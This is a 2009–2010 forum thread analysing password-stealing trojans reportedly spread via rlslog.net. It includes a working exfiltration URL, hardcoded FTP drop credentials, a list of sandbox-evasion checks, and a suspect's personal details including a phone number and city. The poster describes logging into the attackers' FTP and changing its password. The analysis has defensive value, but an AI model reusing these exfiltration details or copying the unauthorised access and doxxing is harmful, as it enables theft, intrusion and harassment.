| Author | Message |
Vektor
2009-06-12 20:52:22 |
| Quote | It is a well known fact that rlslog.net is spreading iStealer trojans which collect all locally stored passwords. Last known trojan was saving a file called u16event.dat and uploaded it via FTP to sv4.altushost.com . Usually a NSIS installer extracts 2 executable files, and one of them is the trojan (known names used are Server 89.exe, Iexplore.exe and Firefox.exe).
Now that FTP account no longer works. So I assumed they are spreading an updated trojan, and I was right. The method is the same, a NSIS installer extracts in Temp directory 2 executables, one named by installer's name and the other is Fizezilla.exe (which is currently not detected by any antivirus). This trojan no longer uploads to FTP. The trojan is packed with a modified VBCrypt (local path to encryption program's project: C:\A\oPWouwTmTKi.vbp / C:\A\tAwDaPtcNxjaUmGF.pdb ), it decrypts and executes a modified variant of iStealer, which collects all locally stored passwords and calls http://warezbb.info/Dont_Bother/index.php?action=add, with the following parameters:- a = resource type (eg.: 8 = no-ip, 10 = firefox password)
- u = URL
- l = login name
- p = password
- c = computer name
For example, for http://www.example.com , user: user, password: password, computer name: computer, the trojan would send a HTTP GET request for the following URL: http://warezbb.info/Dont_Bother/index.php?action=add&a=10&u=%68%74%74%70%3A%2F%2F%77%77%77%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D&l=%75%73%65%72&p=%70%61%73%73%77%6F%72%64&c=%63%6F%6D%70%75%74%65%72 (where "a" is 10 for Firefox passwords, "u" is the hex escaping for "http://www.example.com", etc.). For each password the trojan makes a request like this. Of course, warezbb.info is also hosted by altushost (91.214.44.123 = eu25.altushost.com).
| warezbb.info wrote: | Domain ID:D26912061-LRMS Domain Name:WAREZBB.INFO Created On:15-Nov-2008 22:10:18 UTC Last Updated On:02-Jun-2009 06:30:42 UTC Expiration Date:15-Nov-2009 22:10:18 UTC Sponsoring Registrar:Dynadot LLC (R259-LRMS) Status:CLIENT TRANSFER PROHIBITED Registrant ID:CP-47333 Registrant Name:Shahrukh c/o Dynadot Privacy Registrant Organization: Registrant Street1:PO Box 701 Registrant Street2: Registrant Street3: Registrant City:San Mateo Registrant State/Province:CA Registrant Postal Code:94401 Registrant Country:US Registrant Phone:+1.6505851961 Registrant Phone Ext.: Registrant FAX: Registrant FAX Ext.: Registrant Email:privacy@dynadot.com Admin ID:CP-47333 Admin Name:Shahrukh c/o Dynadot Privacy Admin Organization: Admin Street1:PO Box 701 Admin Street2: Admin Street3: Admin City:San Mateo Admin State/Province:CA Admin Postal Code:94401 Admin Country:US Admin Phone:+1.6505851961 Admin Phone Ext.: Admin FAX: Admin FAX Ext.: Admin Email:privacy@dynadot.com Billing ID:CP-47333 Billing Name:Shahrukh c/o Dynadot Privacy Billing Organization: Billing Street1:PO Box 701 Billing Street2: Billing Street3: Billing City:San Mateo Billing State/Province:CA Billing Postal Code:94401 Billing Country:US Billing Phone:+1.6505851961 Billing Phone Ext.: Billing FAX: Billing FAX Ext.: Billing Email:privacy@dynadot.com Tech ID:CP-47333 Tech Name:Shahrukh c/o Dynadot Privacy Tech Organization: Tech Street1:PO Box 701 Tech Street2: Tech Street3: Tech City:San Mateo Tech State/Province:CA Tech Postal Code:94401 Tech Country:US Tech Phone:+1.6505851961 Tech Phone Ext.: Tech FAX: Tech FAX Ext.: Tech Email:privacy@dynadot.com Name Server:NS5.ALTUSHOST.COM Name Server:NS6.ALTUSHOST.COM |
|
| ns5.altushost.com wrote: | warezbb.info. SOA ns5.altushost.com shahrukh.it.live.com. (2009060202 86400 7200 3600000 86400) warezbb.info. MX 0 warezbb.info warezbb.info. NS ns5.altushost.com warezbb.info. NS ns6.altushost.com warezbb.info. A 91.214.44.123 cpanel A 91.214.44.123 ftp A 91.214.44.123 localhost A 127.0.0.1 mail CNAME warezbb.info webdisk A 91.214.44.123 webmail A 91.214.44.123 whm A 91.214.44.123 www CNAME warezbb.info warezbb.info. SOA ns5.altushost.com shahrukh.it.live.com. (2009060202 86400 7200 3600000 86400) |
|
The mail addresses shahrukh.it@live.com and shahrukh.it@gmail.com were used to register accounts on other forums by users who were selling rapidshare accounts. Registered nicknames: farrukh rkr , shahrukh_pro , shahrukh khalid , dr00n ( rlslog.net staff ) , devilwing , etc.
http://www.webmasterforums.com/buy-sell-ad-space/16787-bulk-rapidshare-seller-offical-legit.html
, user: shahrukh_pro wrote: | Hey guys I Knw m new here but m a trsuted seller but only in bulks Legit Accounts One month Made from points BULK $4.5 Per Month or pr 10k Price may Differ for BULK Thankx Shahrukh.it@live.com Add me msn |
|
| http://www.bzimage.org/showthread.php?t=8534 , user: shahrukh_pro wrote: | Hello Guys I am a Rapidshare Seller Also Available in bulk minimum 5 accounts one month fresh Created With points $5 Per month Accounts. shahrukh.it@live.com only Bulk buyers |
|
| http://www.domainnameforumz.com/showthread.php?t=5382 , user: shahrukh_pro wrote: | m Selling it Buddy 1 Month just for $5 shahrukh.it@live.com add me if u want more |
|
| http://www.warezscene.org/archive/index.php/t-324816.html , user: BBproz wrote: | Hey Guys I Got 1200+ Rapidshare Accounts And i am Giving That For a Simple Task First 10 Ppls Will Get 6 to 8 Months Accounts So Just Replay Here For The Task And Get Accounts :) |
|
This is same dr00n as the one regged on many blogs and forums that have rapidshare links:
| http://www.pakgamers.com/forums/other/22818-ipod-shuffle-2.html , user: dr00n wrote: | OK bro Max i can give is 3k If yes then sms me 03212879757 shahrukh
i live in karachi clifton i can give 3000 but urgent sms me plz 03212879757 |
|
| http://www.wiredpakistan.com/forums/viewtopic.php?id=2874 , shahrukh_pro wrote: | Hey Guys M selling premium Rapidshare accounts m selling them very cheap shared accounts Rules: The account will be sold to 2 persons and u cant change the password.. 6 Months Account only for 1000 (8 Months Acc) 3 Months Account for 600 (4 Months Acc) 1 Month only for 250 (45 Days Acc)
Anybody Interested Contact Me.. 03212879757 Shahrukh
EDITED PACKAGES
...
m live in karachi but it doesnt matter where do i live u have to pay in the form of mobile cards |
|
____________________
|
|
Vektor
2009-06-13 15:01:03 |
| Quote | Another trojan that can be found on archives posted on rlslog.net is a password stealer written in Visual Basic that always comes with MSINET.OCX (usually with hidden attribute). If you see MSINET.OCX in a downloaded archive with some executable files in it, don't execute anything and delete that archive. While the other trojan searches only for Process Monitor and Ethereal / Wireshark window class names, this one searches also for WMWARE, VBOX, Sandboxie, Anubis, ThreatExpert, CWSandbox and JoeBox (http://www.opensc.ws/snippets/3558-detect-5-different-sandboxes.html). Trojan spreader's local path to this VB project: C:\Stealer\Server\Project1.vbp .
This trojan makes a text file with the following format:
| Code: | -------------------------------------------------- Protocol: Username: Password: --------------------------------------------------
HALF LIFE KEY: COUNTER STRIKE KEY: DREAMWEAVER ULTRA DEV4 KEY: SYMANTEC KEY: ADOBE PHOTOSHOP 7.0 KEY: NERO BURNING ROM 5 KEY: ULEAD PHOTOIMPACT 7.0 KEY: SIBELIUS 2 KEY: MIRC USERNAME: MIRC KEY: WINZIP NAME: WINZIP KEY: UT2003 KEY: THE SIMS KEY: THE SIMS HOT DATE KEY: THE SIMS HOUSE PARTY KEY: THE SIMS UNLEASHED DATE KEY: THE SIMS VACATION DATE KEY: PROJECT IGI 2 RETAIL KEY: BATTLEFIELD 1942 KEY: RAINBOW SIX III RAVENSHIELD KEY: THE GLADIATORS KEY: NEED FOR SPEED HOT PURSUIT 2 KEY: FIFA 2003 KEY: C&C GENERALS KEY: RED ALERT 2 KEY: TIBERIAN SUN KEY: --------------------------------------------------
NO-IP User: NO-IP Pass: --------------------------------------------------
Pidgin Info: --------------------------------------------------
FileZilla Info: --------------------------------------------------
Firefox Data: --------------------------------------------------
Yahoo User:Text3 Yahoo Pass:Text4 --------------------------------------------------
|
|
The text file is named by local computer name and is uploaded to ftp://jackfruit.justfree.com using the account for jackfruit with password h870881 (e-mail used to register it: choaschoi@yahoo.com ).
| ftp://jackfruit.justfree.com wrote: | Connect to: (12.06.2009 9:12:40 PM) hostname=jackfruit.justfree.com username=jackfruit startdir= jackfruit.justfree.com=205.134.162.147 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 13 of 200 allowed. 220-Local time is now 14:11. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 2 minutes of inactivity. USER jackfruit 331 User jackfruit OK. Password required PASS *********** 230-User jackfruit has group access to: vhosts 230-OK. Current restricted directory is / 230 4 Kbytes used (0%) - authorized: 2048000 Kb SYST 215 UNIX Type: L8 FEAT 211-Extensions supported: EPRT IDLE MDTM SIZE REST STREAM MLST type*;size*;sizd*;modify*;UNIX.mode*;UNIX.uid*;UNIX.gid*;unique*; MLSD TVFS ESTP PASV EPSV SPSV ESTA AUTH TLS PBSZ PROT 211 End. Connect ok! PWD 257 "/" is your current location Get directory TYPE A 200 TYPE is now ASCII PASV 227 Entering Passive Mode (205,134,162,147,52,21) LIST 150 Accepted data connection Download Waiting for server... 226-Options: -l 226 2 matches total DELE VIC-PC.txt 250-2 Kbytes used (0%) - authorized: 2048000 Kb 250 Deleted VIC-PC.txt |
|
Since the password is hardcoded in trojan .exe, a password change would prevent it to upload anything to that FTP. So I changed the password for it (as long as the password is not h870881, no trojans can upload anything to it). |
|
[-TE-]-Methodman
2009-06-13 16:35:13 |
|
Vektor
2010-12-09 16:05:28 |
| Quote | New host for logs sent by trojans posted on rlslog.net: http://genuinekeyz.com/ (213.5.66.161 = hosted-by.altushost.com), each directory has a php logger used by a different trojan.
| genuinekeyz.com wrote: | Index of / Name Last modified Size Description $ush 02-Sep-2010 12:30 - Hax0r 14-Sep-2010 14:30 - Jmr0x 12-Sep-2010 16:40 - NuW@n 27-Sep-2010 13:19 - X91i 14-Sep-2010 14:30 - cgi-bin 29-Sep-2010 19:39 - ftp 09-Dec-2010 13:08 - rcxxteer 17-Nov-2010 14:27 - s@nsh 27-Sep-2010 21:05 - xxxyxxx 27-Sep-2010 14:09 - Proudly Served by LiteSpeed Web Server at genuinekeyz.com Port 80 |
|
Desperate attempt from same hosted-by.altushost.com) to spam this website:
| 79.142.64.19 = hosted-by.altushost.com wrote: | | Code: | [11:42] <-TE-> Web report from IP: 79.142.64.19 ( snkpidz ): "ZVGyX1 <a href="http://fgdrkiehyebh.com/">fgdrkiehyebh</a>, [url=http://tygsodnozayu.com/]tygsodnozayu[/url], [link=http://nvgoxsubviop.com/]nvgoxsubviop[/link], http://szhcsrguujlm.com/" [11:42] <-TE-> Web report from IP: 79.142.64.19 ( bjypcb ): "jhSvEs <a href="http://jgfujmitzbgf.com/">jgfujmitzbgf</a>, [url=http://otocynzarxuq.com/]otocynzarxuq[/url], [link=http://jdwhcekkrhqv.com/]jdwhcekkrhqv[/link], http://saxjexabzpec.com/" [11:47] <-TE-> Web report from IP: 79.142.64.19 ( bzpnooudy ): "AvNWC0 <a href="http://nhgkkruaanzi.com/">nhgkkruaanzi</a>, [url=http://tvoxfaltnilx.com/]tvoxfaltnilx[/url], [link=http://sopxvbqagunz.com/]sopxvbqagunz[/link], http://tcwdbaypyxzc.com/" [11:47] <-TE-> Web report from IP: 79.142.64.19 ( deacwfs ): "eqCtOr <a href="http://dqxmxzrjnbry.com/">dqxmxzrjnbry</a>, [url=http://mqlclgipszbc.com/]mqlclgipszbc[/url], [link=http://tfeazpixszcd.com/]tfeazpixszcd[/link], http://dgivfccbmatu.com/" [11:52] <-TE-> Web report from IP: 79.142.64.19 ( hokzoblqr ): "hEJGA8 <a href="http://isssfggrhzef.com/">isssfggrhzef</a>, [url=http://zpougirxcydm.com/]zpougirxcydm[/url], [link=http://zxpiyovraqdo.com/]zxpiyovraqdo[/link], http://otxkueakvoql.com/" [11:53] <-TE-> Web report from IP: 79.142.64.19 ( fsrvfpkrlw ): "QjquHE <a href="http://oswdqyquaneh.com/">oswdqyquaneh</a>, [url=http://zldfsovgixrx.com/]zldfsovgixrx[/url], [link=http://ftxfygnqeprq.com/]ftxfygnqeprq[/link], http://wzvygxjuztez.com/" [12:00] <-TE-> Web report from IP: 79.142.64.19 ( htepqwntaf ): "rbZj9i <a href="http://otbytyucwmrr.com/">otbytyucwmrr</a>, [url=http://acdnzrxgqmqf.com/]acdnzrxgqmqf[/url], [link=http://dmoxjigrcbon.com/]dmoxjigrcbon[/link], http://vicfoupnvkmu.com/" |
|
|
|
| nemesis.te-home.net wrote: | [2010-12-09 01:44:21] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
...
[2010-12-09 02:13:20] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact [2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact [2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" [2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
...
[2010-12-09 02:24:27] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" [2010-12-09 02:24:27] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact |
|
Fail. |
|
|